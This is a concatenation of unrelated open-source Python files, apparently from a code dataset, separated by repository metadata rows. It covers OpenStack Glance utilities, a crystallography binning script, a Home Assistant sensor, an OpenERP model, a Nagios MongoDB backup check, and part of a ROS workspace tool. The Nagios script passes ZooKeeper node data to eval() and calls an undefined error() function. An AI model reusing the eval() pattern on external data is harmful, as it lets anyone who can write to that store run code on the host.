        return cooperative_iter(self.fd.__iter__())
class LimitingReader(object):
    """
    Wrapper around an image data source that raises
    ``exception.ImageSizeLimitExceeded`` as soon as more than the
    configured number of bytes has been consumed.
    """

    def __init__(self, data, limit):
        """
        :param data: Underlying image data object
        :param limit: maximum number of bytes the reader should allow
        """
        self.data = data
        self.limit = limit
        self.bytes_read = 0

    def __iter__(self):
        for piece in self.data:
            self.bytes_read += len(piece)
            if self.bytes_read <= self.limit:
                yield piece
            else:
                raise exception.ImageSizeLimitExceeded()

    def read(self, i):
        piece = self.data.read(i)
        self.bytes_read += len(piece)
        if self.bytes_read > self.limit:
            raise exception.ImageSizeLimitExceeded()
        return piece
def image_meta_to_http_headers(image_meta):
    """
    Flatten a mapping of image metadata into a dict of HTTP headers that
    can be fed to either a Webob Request object or an
    httplib.HTTP(S)Connection object. Custom properties become
    ``x-image-meta-property-*`` headers; everything else becomes
    ``x-image-meta-*``. None values are skipped.

    :param image_meta: Mapping of image metadata
    """
    headers = {}
    for key, value in image_meta.items():
        if value is None:
            continue
        if key == 'properties':
            for prop_name, prop_value in value.items():
                if prop_value is None:
                    continue
                header = "x-image-meta-property-%s" % prop_name.lower()
                headers[header] = six.text_type(prop_value)
        else:
            headers["x-image-meta-%s" % key.lower()] = six.text_type(value)
    return headers
def get_image_meta_from_headers(response):
    """
    Processes HTTP headers from a supplied response that
    match the x-image-meta and x-image-meta-property and
    returns a mapping of image metadata and properties

    :param response: Response to process (httplib.HTTPResponse exposing
        ``getheaders()``, or a webob.Response exposing ``headers``)
    :returns: dict of image fields plus a ``'properties'`` sub-dict
    :raises exc.HTTPBadRequest: for an x-image-meta-* header not in the
        IMAGE_META_HEADERS whitelist
    :raises exception.InvalidParameterValue: for a numeric field that
        cannot be parsed or is negative
    """
    result = {}
    properties = {}

    if hasattr(response, 'getheaders'):  # httplib.HTTPResponse
        headers = response.getheaders()
    else:  # webob.Response
        headers = response.headers.items()

    for key, value in headers:
        key = str(key.lower())
        if key.startswith('x-image-meta-property-'):
            field_name = key[len('x-image-meta-property-'):].replace('-', '_')
            # Empty header values are normalized to None.
            properties[field_name] = value or None
        elif key.startswith('x-image-meta-'):
            field_name = key[len('x-image-meta-'):].replace('-', '_')
            if 'x-image-meta-' + field_name not in IMAGE_META_HEADERS:
                msg = _("Bad header: %(header_name)s") % {'header_name': key}
                raise exc.HTTPBadRequest(msg, content_type="text/plain")
            result[field_name] = value or None
    result['properties'] = properties

    for key, nullable in [('size', False), ('min_disk', False),
                          ('min_ram', False), ('virtual_size', True)]:
        if key in result:
            try:
                result[key] = int(result[key])
            except ValueError:
                # A nullable field may legitimately carry the string 'None'.
                if nullable and result[key] == str(None):
                    result[key] = None
                else:
                    extra = (_("Cannot convert image %(key)s '%(value)s' "
                               "to an integer.")
                             % {'key': key, 'value': result[key]})
                    raise exception.InvalidParameterValue(value=result[key],
                                                          param=key,
                                                          extra_msg=extra)
            # Check 'is not None' BEFORE comparing to 0: a nullable field
            # (virtual_size) can be None here, and 'None < 0' raises
            # TypeError on Python 3. The previous ordering only worked by
            # accident on Python 2, where None compares less than ints.
            if result[key] is not None and result[key] < 0:
                extra = _('Cannot be a negative value.')
                raise exception.InvalidParameterValue(value=result[key],
                                                      param=key,
                                                      extra_msg=extra)

    for key in ('is_public', 'deleted', 'protected'):
        if key in result:
            result[key] = strutils.bool_from_string(result[key])
    return result
def create_mashup_dict(image_meta):
    """
    Flatten the given image metadata into a single dictionary: nested
    dicts (e.g. custom properties) are recursively merged into the top
    level, dropping the dict-valued key itself and skipping any nested
    key that already exists at the top level.

    :param image_meta: metadata of image with core and custom properties
    """
    mashup = {}
    for key, value in six.iteritems(image_meta):
        if not isinstance(value, dict):
            mashup[key] = value
        else:
            for subkey, subvalue in six.iteritems(create_mashup_dict(value)):
                if subkey not in image_meta:
                    mashup[subkey] = subvalue
    return mashup
def safe_mkdirs(path):
    """Create ``path`` (with parents), tolerating its prior existence.

    Any OSError other than EEXIST is propagated to the caller.
    """
    try:
        os.makedirs(path)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        raise
def safe_remove(path):
    """Delete the file at ``path``, ignoring the case where it is gone.

    Any OSError other than ENOENT is propagated to the caller.
    """
    try:
        os.remove(path)
    except OSError as err:
        if err.errno == errno.ENOENT:
            return
        raise
class PrettyTable(object):
    """Creates an ASCII art table for use in bin/glance

    Example:

        ID  Name              Size         Hits
        --- ----------------- ------------ -----
        122 image                       22     0
    """

    def __init__(self):
        self.columns = []

    def add_column(self, width, label="", just='l'):
        """Add a column to the table

        :param width: number of characters wide the column should be
        :param label: column heading
        :param just: justification for the column, 'l' for left,
                     'r' for right
        """
        self.columns.append((width, label, just))

    def make_header(self):
        """Return the heading line and the dashed rule, newline-joined."""
        # NOTE(sirp): headers are always left justified
        labels = ' '.join(self._clip_and_justify(label, width, 'l')
                          for width, label, _ in self.columns)
        rules = ' '.join('-' * width for width, _, _ in self.columns)
        return labels + '\n' + rules

    def make_row(self, *args):
        """Render one data row, clipping/justifying each cell to its column."""
        cells = [self._clip_and_justify(data, width, just)
                 for data, (width, _, just) in zip(args, self.columns)]
        return ' '.join(cells)

    @staticmethod
    def _clip_and_justify(data, width, just):
        """Stringify *data*, clip to *width*, then pad per *just*."""
        text = str(data)[:width]
        if just == 'r':
            return text.rjust(width)
        return text.ljust(width)
def get_terminal_size():
    """Return the terminal size as a (height, width) pair of positive ints.

    Dispatches on platform.os.name; raises exception.Invalid when the size
    cannot be determined or is not a pair of positive integers.
    """
    def _get_terminal_size_posix():
        import fcntl
        import struct
        import termios
        height_width = None
        try:
            # TIOCGWINSZ on stderr yields (rows, cols) as two signed shorts.
            height_width = struct.unpack('hh', fcntl.ioctl(sys.stderr.fileno(),
                                        termios.TIOCGWINSZ,
                                        struct.pack('HH', 0, 0)))
        except Exception:
            pass
        if not height_width:
            try:
                # Fall back to the stty utility when the ioctl fails
                # (e.g. stderr is not attached to a terminal).
                p = subprocess.Popen(['stty', 'size'],
                                    shell=False,
                                    stdout=subprocess.PIPE,
                                    stderr=open(os.devnull, 'w'))
                result = p.communicate()
                if p.returncode == 0:
                    return tuple(int(x) for x in result[0].split())
            except Exception:
                pass
        return height_width
    def _get_terminal_size_win32():
        try:
            from ctypes import create_string_buffer
            from ctypes import windll
            # -12 is STD_ERROR_HANDLE on win32.
            handle = windll.kernel32.GetStdHandle(-12)
            csbi = create_string_buffer(22)
            res = windll.kernel32.GetConsoleScreenBufferInfo(handle, csbi)
        except Exception:
            return None
        if res:
            import struct
            unpack_tmp = struct.unpack("hhhhHhhhhhh", csbi.raw)
            (bufx, bufy, curx, cury, wattr,
            left, top, right, bottom, maxx, maxy) = unpack_tmp
            height = bottom - top + 1
            width = right - left + 1
            return (height, width)
        else:
            return None
    def _get_terminal_size_unknownOS():
        raise NotImplementedError
    # Pick the implementation for this OS; unknown OSes raise.
    func = {'posix': _get_terminal_size_posix,
            'win32': _get_terminal_size_win32}
    height_width = func.get(platform.os.name, _get_terminal_size_unknownOS)()
    if height_width is None:
        raise exception.Invalid()
    # Sanity-check: both dimensions must be positive ints.
    for i in height_width:
        if not isinstance(i, int) or i <= 0:
            raise exception.Invalid()
    return height_width[0], height_width[1]
def mutating(func):
    """Decorator to enforce read-only logic"""
    @functools.wraps(func)
    def wrapped(self, req, *args, **kwargs):
        # Reject any mutating call issued through a read-only context.
        if not req.context.read_only:
            return func(self, req, *args, **kwargs)
        msg = "Read-only access"
        LOG.debug(msg)
        raise exc.HTTPForbidden(msg, request=req,
                                content_type="text/plain")
    return wrapped
def setup_remote_pydev_debug(host, port):
    """Attach this process to a remote pydev debug server at host:port.

    Returns True on success; on failure logs the error and re-raises.
    """
    error_msg = _LE('Error setting up the debug environment. Verify that the'
                    ' option pydev_worker_debug_host is pointing to a valid '
                    'hostname or IP on which a pydev server is listening on'
                    ' the port indicated by pydev_worker_debug_port.')
    try:
        try:
            # Newer pydev distributions nest pydevd inside the pydev package.
            from pydev import pydevd
        except ImportError:
            import pydevd
        pydevd.settrace(host,
                        port=port,
                        stdoutToServer=True,
                        stderrToServer=True)
        return True
    except Exception:
        # Log, then let save_and_reraise_exception propagate the original.
        with excutils.save_and_reraise_exception():
            LOG.exception(error_msg)
def validate_key_cert(key_file, cert_file):
    """Verify that *key_file* and *cert_file* are a usable, matching pair.

    Loads both PEM files, then performs a sign/verify round-trip with
    random data. Raises RuntimeError on any load or verification problem.
    """
    try:
        # Track which file we are working on so error messages are precise.
        error_key_name = "private key"
        error_filename = key_file
        with open(key_file, 'r') as keyfile:
            key_str = keyfile.read()
        key = crypto.load_privatekey(crypto.FILETYPE_PEM, key_str)
        error_key_name = "certificate"
        error_filename = cert_file
        with open(cert_file, 'r') as certfile:
            cert_str = certfile.read()
        cert = crypto.load_certificate(crypto.FILETYPE_PEM, cert_str)
    except IOError as ioe:
        raise RuntimeError(_("There is a problem with your %(error_key_name)s "
                             "%(error_filename)s. Please verify it."
                             " Error: %(ioe)s") %
                           {'error_key_name': error_key_name,
                            'error_filename': error_filename,
                            'ioe': ioe})
    except crypto.Error as ce:
        raise RuntimeError(_("There is a problem with your %(error_key_name)s "
                             "%(error_filename)s. Please verify it. OpenSSL"
                             " error: %(ce)s") %
                           {'error_key_name': error_key_name,
                            'error_filename': error_filename,
                            'ce': ce})
    try:
        # Sign random data with the key and verify with the cert to prove
        # the two actually belong together.
        data = str(uuid.uuid4())
        digest = CONF.digest_algorithm
        if digest == 'sha1':
            LOG.warn('The FIPS (FEDERAL INFORMATION PROCESSING STANDARDS)'
                     ' state that the SHA-1 is not suitable for'
                     ' general-purpose digital signature applications (as'
                     ' specified in FIPS 186-3) that require 112 bits of'
                     ' security. The default value is sha1 in Kilo for a'
                     ' smooth upgrade process, and it will be updated'
                     ' with sha256 in next release(L).')
        out = crypto.sign(key, data, digest)
        crypto.verify(cert, out, data, digest)
    except crypto.Error as ce:
        raise RuntimeError(_("There is a problem with your key pair. "
                             "Please verify that cert %(cert_file)s and "
                             "key %(key_file)s belong together. OpenSSL "
                             "error %(ce)s") % {'cert_file': cert_file,
                                                'key_file': key_file,
                                                'ce': ce})
def get_test_suite_socket():
    """Return a listening socket inherited from the test suite, or None.

    The test runner hands over an open file descriptor via the environment
    variable named by GLANCE_TEST_SOCKET_FD_STR.
    """
    global GLANCE_TEST_SOCKET_FD_STR
    if GLANCE_TEST_SOCKET_FD_STR in os.environ:
        fd = int(os.environ[GLANCE_TEST_SOCKET_FD_STR])
        sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
        if six.PY2:
            # Python 2 needs re-wrapping to obtain a full socket object.
            sock = socket.SocketType(_sock=sock)
        sock.listen(CONF.backlog)
        # Consume the handover: drop the env var and close the original fd
        # (fromfd duplicated it).
        del os.environ[GLANCE_TEST_SOCKET_FD_STR]
        os.close(fd)
        return sock
    return None
def is_uuid_like(val):
    """Returns validation of a value as a UUID.

    For our purposes, a UUID is a canonical form string:
    aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa
    """
    try:
        parsed = uuid.UUID(val)
    except (TypeError, ValueError, AttributeError):
        return False
    # Round-trip: only the canonical lowercase form is accepted.
    return str(parsed) == val
def is_valid_hostname(hostname):
    """Verify whether a hostname (not an FQDN) is valid."""
    matched = re.match('^[a-zA-Z0-9-]+$', hostname)
    return matched is not None
def is_valid_fqdn(fqdn):
    """Verify whether a host is a valid FQDN."""
    # Raw string: '\.' in a plain literal is an invalid escape sequence
    # (SyntaxWarning on modern Python), even though it happens to produce
    # the same pattern.
    return re.match(r'^[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$', fqdn) is not None
def parse_valid_host_port(host_port):
    """
    Given a "host:port" string, attempts to parse it as intelligently as
    possible to determine if it is valid. This includes IPv6 [host]:port form,
    IPv4 ip:port form, and hostname:port or fqdn:port form.

    Invalid inputs will raise a ValueError, while valid inputs will return
    a (host, port) tuple where the port will always be of type int.
    """
    try:
        try:
            host, port = netutils.parse_host_port(host_port)
        except Exception:
            raise ValueError(_('Host and port "%s" is not valid.') % host_port)
        if not netutils.is_valid_port(port):
            raise ValueError(_('Port "%s" is not valid.') % port)
        # First check for valid IPv6 and IPv4 addresses, then a generic
        # hostname. Failing those, if the host includes a period, then this
        # should pass a very generic FQDN check. The FQDN check for letters at
        # the tail end will weed out any hilariously absurd IPv4 addresses.
        if not (netutils.is_valid_ipv6(host) or netutils.is_valid_ipv4(host) or
                is_valid_hostname(host) or is_valid_fqdn(host)):
            raise ValueError(_('Host "%s" is not valid.') % host)
    # Any failure above (including the ValueErrors raised there) is
    # re-wrapped into one ValueError with usage guidance appended.
    except Exception as ex:
        raise ValueError(_('%s '
                           'Please specify a host:port pair, where host is an '
                           'IPv4 address, IPv6 address, hostname, or FQDN. If '
                           'using an IPv6 address, enclose it in brackets '
                           'separately from the port (i.e., '
                           '"[fe80::a:b:c]:9876").') % ex)
    return (host, int(port))
# Matches code points outside the Basic Multilingual Plane (characters that
# need 4-byte UTF-8 sequences, which MySQL's 'utf8' charset cannot store).
try:
    REGEX_4BYTE_UNICODE = re.compile(u'[\U00010000-\U0010ffff]')
except re.error:
    # UCS-2 build case
    REGEX_4BYTE_UNICODE = re.compile(u'[\uD800-\uDBFF][\uDC00-\uDFFF]')
def no_4byte_params(f):
    """
    Checks that no 4 byte unicode characters are allowed
    in dicts' keys/values and string's parameters
    """
    # Fix: preserve the wrapped function's metadata, consistent with the
    # `mutating` decorator in this module.
    @functools.wraps(f)
    def wrapper(*args, **kwargs):
        def _is_match(some_str):
            # Only unicode text can carry non-BMP (4-byte) characters.
            return (isinstance(some_str, six.text_type) and
                    REGEX_4BYTE_UNICODE.findall(some_str) != [])

        def _check_dict(data_dict):
            # a dict of dicts has to be checked recursively
            for key, value in six.iteritems(data_dict):
                if isinstance(value, dict):
                    _check_dict(value)
                else:
                    if _is_match(key):
                        msg = _("Property names can't contain 4 byte unicode.")
                        raise exception.Invalid(msg)
                    if _is_match(value):
                        msg = (_("%s can't contain 4 byte unicode characters.")
                               % key.title())
                        raise exception.Invalid(msg)

        for data_dict in [arg for arg in args if isinstance(arg, dict)]:
            _check_dict(data_dict)
        # now check args for str values
        for arg in args:
            if _is_match(arg):
                msg = _("Param values can't contain 4 byte unicode.")
                raise exception.Invalid(msg)
        # check kwargs as well, as params are passed as kwargs via
        # registry calls
        _check_dict(kwargs)
        return f(*args, **kwargs)
    return wrapper
def validate_mysql_int(*args, **kwargs):
    """
    Make sure that all arguments are less than 2 ** 31 - 1.

    This limitation is introduced because mysql stores INT in 4 bytes.
    If the validation fails for some argument, exception.Invalid is raised with
    appropriate information.
    """
    max_int = (2 ** 31) - 1

    for value in args:
        if value > max_int:
            raise exception.Invalid(
                _("Value %(value)d out of range, "
                  "must not exceed %(max)d") % {"value": value,
                                                "max": max_int})

    # Keyword params: None/falsy values are skipped on purpose.
    for name in kwargs:
        value = kwargs.get(name)
        if value and value > max_int:
            raise exception.Invalid(
                _("'%(param)s' value out of range, "
                  "must not exceed %(max)d") % {"param": name,
                                                "max": max_int})
def stash_conf_values():
    """
    Make a copy of some of the current global CONF's settings.
    Allows determining if any of these values have changed
    when the config is reloaded.
    """
    return {
        'bind_host': CONF.bind_host,
        'bind_port': CONF.bind_port,
        # Bug fix: this previously stashed CONF.cert_file under
        # 'tcp_keepidle', so tcp_keepidle changes were never detected
        # on config reload.
        'tcp_keepidle': CONF.tcp_keepidle,
        'backlog': CONF.backlog,
        'key_file': CONF.key_file,
        'cert_file': CONF.cert_file,
    }
| apache-2.0 | 29,378,260,714,325,270 | 34.078167 | 79 | 0.552059 | false | 4.281625 | false | false | false |
keitaroyam/yamtbx | cctbx_progs/dano_vs_d.py | 1 | 1364 | """
Usage:
phenix.python dano_vs_d.py your.sca 20
"""
import iotbx.file_reader
from cctbx.array_family import flex
def run(hklin, n_bins):
    """Print the mean |anomalous difference| per resolution bin for every
    anomalous X-ray intensity array found in reflection file *hklin*."""
    for array in iotbx.file_reader.any_file(hklin).file_server.miller_arrays:
        # skip if not anomalous intensity data
        if not (array.is_xray_intensity_array() and array.anomalous_flag()):
            print "skipping", array.info()
            continue
        # We assume that data is already merged
        assert array.is_unique_set_under_symmetry()
        # take anomalous differences
        dano = array.anomalous_differences()
        # process with binning
        dano.setup_binner(n_bins=n_bins)
        binner = dano.binner()
        print "Array:", array.info()
        print " dmax dmin nrefs dano"
        for i_bin in binner.range_used():
            # selection for this bin. sel is flex.bool object (list of True of False)
            sel = binner.selection(i_bin)
            # take mean of absolute value of anomalous differences in a bin
            bin_mean = flex.mean(flex.abs(dano.select(sel).data()))
            d_max, d_min = binner.bin_d_range(i_bin)
            print "%7.2f %7.2f %6d %.2f" % (d_max, d_min, binner.count(i_bin), bin_mean)
# run()
if __name__ == "__main__":
    import sys
    # argv: <reflection file (e.g. .sca)> <number of resolution bins>
    hklin = sys.argv[1]
    n_bins = int(sys.argv[2])
    run(hklin, n_bins)
| bsd-3-clause | 3,833,057,630,944,875,500 | 31.47619 | 88 | 0.60044 | false | 3.135632 | false | false | false |
jamespcole/home-assistant | homeassistant/components/eight_sleep/binary_sensor.py | 1 | 1832 | """Support for Eight Sleep binary sensors."""
import logging
from homeassistant.components.binary_sensor import BinarySensorDevice
from . import CONF_BINARY_SENSORS, DATA_EIGHT, NAME_MAP, EightSleepHeatEntity
_LOGGER = logging.getLogger(__name__)
DEPENDENCIES = ['eight_sleep']
async def async_setup_platform(hass, config, async_add_entities,
                               discovery_info=None):
    """Set up the eight sleep binary sensor."""
    if discovery_info is None:
        return

    eight = hass.data[DATA_EIGHT]
    # One presence sensor entity per configured binary sensor id.
    entities = [
        EightHeatSensor('Eight', eight, sensor_type)
        for sensor_type in discovery_info[CONF_BINARY_SENSORS]
    ]
    async_add_entities(entities, True)
class EightHeatSensor(EightSleepHeatEntity, BinarySensorDevice):
    """Representation of a Eight Sleep heat-based sensor."""
    def __init__(self, name, eight, sensor):
        """Initialize the sensor.

        :param name: platform display-name prefix
        :param eight: shared Eight Sleep API object
        :param sensor: sensor id, formatted '<side>_...'
        """
        super().__init__(eight)
        self._sensor = sensor
        self._mapped_name = NAME_MAP.get(self._sensor, self._sensor)
        self._name = '{} {}'.format(name, self._mapped_name)
        self._state = None
        # The sensor id's first underscore-separated token names the bed
        # side, which selects the user whose presence we report.
        self._side = self._sensor.split('_')[0]
        self._userid = self._eight.fetch_userid(self._side)
        self._usrobj = self._eight.users[self._userid]
        _LOGGER.debug("Presence Sensor: %s, Side: %s, User: %s",
                      self._sensor, self._side, self._userid)
    @property
    def name(self):
        """Return the name of the sensor, if any."""
        return self._name
    @property
    def is_on(self):
        """Return true if the binary sensor is on."""
        return self._state
    async def async_update(self):
        """Retrieve latest state."""
        # State mirrors the per-user bed_presence flag from the Eight API.
        self._state = self._usrobj.bed_presence
| apache-2.0 | -4,521,372,871,055,284,700 | 28.548387 | 77 | 0.622817 | false | 3.832636 | false | false | false |
iw3hxn/LibrERP | purchase_order_version/models/inherit_purchase_order_line.py | 1 | 2019 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2004-2014 Didotech srl (<http://www.didotech.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import orm, fields
class purchase_order_line(orm.Model):
    """Extend purchase.order.line to remember, on a versioned copy, which
    original line it was duplicated from."""
    _inherit = "purchase.order.line"
    _columns = {
        # 'active': fields.related('order_id', 'active', type='boolean', string='Active', store=False),
        # Back-reference to the source line when this line was created by
        # order versioning (see the 'versioning' context flag below).
        'purchase_line_copy_id': fields.many2one('purchase.order.line', 'Orig version', required=False, readonly=False),
    }
    def copy_data(self, cr, uid, line_id, defaults=None, context=None):
        # When copying as part of versioning, stash the source line id.
        context = context or self.pool['res.users'].context_get(cr, uid)
        defaults = defaults or {}
        if context.get('versioning', False):
            defaults['purchase_line_copy_id'] = line_id
        return super(purchase_order_line, self).copy_data(cr, uid, line_id, defaults, context)
    def copy(self, cr, uid, line_id, default, context=None):
        # Same bookkeeping as copy_data for the duplicate-record path.
        context = context or self.pool['res.users'].context_get(cr, uid)
        default = default or {}
        if context.get('versioning', False):
            default['purchase_line_copy_id'] = line_id
        return super(purchase_order_line, self).copy(cr, uid, line_id, default, context)
| agpl-3.0 | 2,852,159,605,738,768,400 | 43.866667 | 120 | 0.616642 | false | 3.966601 | false | false | false |
Tealium/nagios | files/default/plugins/check_mongodb_backup.py | 1 | 6143 | #!/usr/bin/env python
desc = """
Checks the status of the most recent MongoDB backup or, with the --snap option,
checks that the snapshots for the most recent backup were completed.
"""
import kazoo
from kazoo.client import KazooClient
from kazoo.client import KazooState
import yaml
import argparse
import time
from datetime import datetime
from datetime import timedelta
class Status(dict):
    # Base Nagios plugin status: name ('OK', ...), exit code and message.
    def __init__(self, name, code, msg):
        self.name = name
        self.code = code
        self.msg = msg
    def exit(self):
        # Print the standard "<STATUS> - <message>" line and terminate the
        # process with the matching Nagios exit code.
        print "%s - %s" % (self.name, self.msg)
        raise SystemExit(self.code)
class OK(Status):
    # Nagios OK status (exit code 0).
    def __init__(self,msg):
        super(OK,self).__init__('OK', 0, msg)
class WARNING(Status):
    # Nagios WARNING status (exit code 1).
    def __init__(self,msg):
        super(WARNING,self).__init__('WARNING', 1, msg)
class CRITICAL(Status):
    # Nagios CRITICAL status (exit code 2).
    def __init__(self,msg):
        super(CRITICAL,self).__init__('CRITICAL', 2, msg)
class UNKNOWN(Status):
    # Nagios UNKNOWN status (exit code 3).
    def __init__(self,msg):
        super(UNKNOWN,self).__init__('UNKNOWN', 3, msg)
def state_listener(state):
    # Kazoo connection-state callback; a healthy CONNECTED state is a no-op.
    # NOTE(review): error() is not defined anywhere in this file, so a LOST
    # or SUSPENDED connection would raise NameError here -- confirm intent.
    if state == KazooState.LOST:
        error("zookeeper connection state was lost")
    elif state == KazooState.SUSPENDED:
        error("zookeeper connection state was suspended")
    elif state == KazooState.CONNECTED:
        pass
def create_date_path(days_ago):
    """Return a '/YYYY/MM/DD' path fragment for the current UTC date,
    optionally shifted *days_ago* days into the past."""
    when = datetime.utcnow()
    if days_ago:
        when -= timedelta(days=days_ago)
    return when.strftime("/%Y/%m/%d")
def look4abort(zk, days_ago=None):
    """Check the most recent backup hour of the day for an ABORT marker.

    Looks under <prefix>/<cluster>/YYYY/MM/DD in ZooKeeper; when today has
    no backup data yet, falls back to yesterday (but no further).
    Returns an OK, WARNING or CRITICAL Status object.
    """
    day_node = args.prefix.rstrip('/') + '/' + args.env.rstrip('/') + create_date_path(days_ago)

    if zk.exists(day_node):
        hours = zk.retry(zk.get_children, day_node)
        if len(hours):
            # Only the most recent hour of the day is interesting.
            hours.sort()
            abort_node = day_node + '/' + str(hours[-1]) + '/ABORT'
            if zk.exists(abort_node):
                excuse = zk.retry(zk.get, abort_node)
                return CRITICAL("found backup abort status: %s" % excuse[0])
            return OK('no abort during most recent backup')

    # Apparently no backups yet today. Let's check yesterday.
    # Let's not explore infinity though...
    # (Refactor: the two identical fallback branches were merged here.)
    if days_ago: return WARNING('found no backup info for past two days')
    return look4abort(zk, 1)
def look4snaps(zk, days_ago=None):
    """Check the EBS snapshots recorded for the most recent backup hour.

    Snapshot ids are read from the per-shard ZooKeeper nodes and their
    status queried via the EC2 API; falls back to yesterday when today
    has no backup data yet (but no further).
    """
    import boto
    import boto.ec2
    import boto.utils
    import chef
    instance_id = boto.utils.get_instance_metadata()['instance-id']
    # Region: explicit --region flag, else the region this host runs in.
    if args.region:
        region_spec = args.region
    else:
        region_spec = boto.utils.get_instance_identity()['document']['region']
    # AWS credentials come from the chef 'aws' data bag for our app env.
    chef_api = chef.autoconfigure()
    node = chef.Node(instance_id)
    my_app_env = node.attributes['app_environment']
    bag = chef.DataBag('aws')
    item = bag[my_app_env]
    key_id = str(item['aws_access_key_id'])
    key_secret = str(item['aws_secret_access_key'])
    region = boto.ec2.get_region(region_spec, aws_access_key_id=key_id, aws_secret_access_key=key_secret)
    conn = region.connect(aws_access_key_id=key_id, aws_secret_access_key=key_secret)
    day_node = args.prefix.rstrip('/') + '/' + args.env.rstrip('/') + create_date_path(days_ago)
    if zk.exists(day_node):
        hours = zk.retry(zk.get_children, day_node)
        if len(hours):
            hours.sort()
            shards_parent_node = day_node + '/' + str(hours[-1]) + '/mongodb_shard_server'
            if zk.exists(shards_parent_node):
                shard_list = zk.retry(zk.get_children, shards_parent_node)
                if len(shard_list) > 0:
                    msg = ''
                    err = 0
                    for shard in shard_list:
                        shard_data = zk.retry(zk.get, shards_parent_node + '/' + shard)
                        # NOTE(review): eval() of ZooKeeper node data executes
                        # arbitrary content; ast.literal_eval would be safer.
                        snaps = conn.get_all_snapshots(eval(shard_data[0]))
                        msg = msg + ", %s [" % shard
                        snap_text = ''
                        for snap in snaps:
                            # Any snapshot in 'error' state makes the whole
                            # check CRITICAL.
                            if snap.status == 'error': err = 1
                            snap_text = snap_text + ", %s (%s)" % (str(snap), snap.status)
                        msg = msg + snap_text.strip(', ') + ']'
                    if err:
                        return CRITICAL(msg.strip(', '))
                    return OK(msg.strip(', '))
    # Apparently no backups yet today. Let's check yesterday.
    # Let's not explore infinity though...
    if days_ago: return WARNING('found no backup info for past two days')
    return look4snaps(zk, 1)
if __name__ == '__main__':
    # CLI entry point: parse options, connect to ZooKeeper, run the
    # requested check, and exit with a Nagios status code.
    gargle = argparse.ArgumentParser(prog = "check_mongodb_backup", description=desc,
                             usage='%(prog)s [options]',
                             formatter_class = argparse.RawDescriptionHelpFormatter)
    gargle.add_argument('--prefix', dest="prefix", metavar="<path_prefix>", default='/backup/mongodb_cluster/',
                        help='ZooKeeper path prefix (default: /backup/mongodb_cluster/)')
    gargle.add_argument('--cluster', dest="env", metavar="<cluster_id>", default='production',
                        help='MongoDB cluster name (default: production)')
    gargle.add_argument('--config', dest='yaml', metavar="<config_file>",
                        help='ZooKeeper server list file (default: /etc/zookeeper/server_list.yml)',
                        default='/etc/zookeeper/server_list.yml')
    gargle.add_argument('--region', metavar="<aws-region-spec>",
                        help='AWS region where the snapshots are stored (default: region of host instance)')
    gargle.add_argument('--snaps', action='store_true',
                        help='check snapshots from most recent backup (default: False)')
    args = gargle.parse_args()
    try:
        # Build the 'host:port,host:port' connection string from the YAML
        # server list.
        y = yaml.safe_load(open(args.yaml))
        servers = ','.join("%s:%s" % (s['host'],s['port']) for s in y['zookeepers'])
        zk = KazooClient(hosts=servers)
        zk.start()
        zk.add_listener(state_listener)
        if args.snaps:
            status = look4snaps(zk)
        else:
            status = look4abort(zk)
        zk.remove_listener(state_listener)
        zk.stop()
        status.exit()
    except Exception as e:
        # Any unexpected failure is reported as Nagios UNKNOWN.
        UNKNOWN("Error: %s" % e).exit()
| apache-2.0 | 3,951,950,523,133,966,300 | 27.178899 | 110 | 0.608335 | false | 3.480453 | false | false | false |
fkie/rosrepo | src/rosrepo/util.py | 1 | 6206 | # coding=utf-8
#
# ROSREPO
# Manage ROS workspaces with multiple Gitlab repositories
#
# Author: Timo Röhling
#
# Copyright 2016 Fraunhofer FKIE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import os
import fcntl
import termios
import struct
import multiprocessing
import signal
from tempfile import mkstemp
from subprocess import Popen, PIPE
from yaml import load as yaml_load_impl, dump as yaml_dump_impl, YAMLError
try:
from yaml import CSafeLoader as SafeLoader, CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
def yaml_load(stream, Loader=SafeLoader):
    # Safe YAML parse (C-accelerated loader when libyaml is available).
    return yaml_load_impl(stream, Loader=Loader)
def yaml_dump(data, stream=None, Dumper=SafeDumper, **kwargs):
    # Safe YAML serialization; extra kwargs pass through to yaml.dump.
    return yaml_dump_impl(data, stream=stream, Dumper=Dumper, **kwargs)
class NamedTuple(object):
    """Lightweight mutable named-tuple base class.

    Subclasses declare their fields via ``__slots__`` and gain
    positional/keyword construction, index access and a readable repr.
    Missing fields default to None.
    """
    __slots__ = ()

    def __init__(self, *args, **kwargs):
        field_names = self.__slots__
        # Keyword values first (absent ones default to None)...
        for name in field_names:
            setattr(self, name, kwargs.get(name))
        # ...then positional values override in declaration order.
        for name, value in zip(field_names, args):
            setattr(self, name, value)

    def __str__(self):
        body = ", ".join("%s=%r" % (name, getattr(self, name))
                         for name in self.__slots__)
        return "%s(%s)" % (self.__class__.__name__, body)

    __repr__ = __str__

    def __getitem__(self, index):
        return getattr(self, self.__slots__[index])

    def __setitem__(self, index, value):
        return setattr(self, self.__slots__[index], value)

    def __len__(self):
        return len(self.__slots__)
# Py2/Py3 compatibility shim: dict.iteritems does not exist on Python 3.
try:
    iteritems = dict.iteritems
except AttributeError:
    iteritems = dict.items
class UserError(RuntimeError):
    """Error caused by user input/environment, as opposed to an internal bug."""
    pass
def is_deprecated_package(manifest):
    """Return True if the package manifest carries a 'deprecated' export."""
    return any(export.tagname == "deprecated" for export in manifest.exports)
def deprecated_package_info(manifest):
    """Return the text of the manifest's 'deprecated' export, or None."""
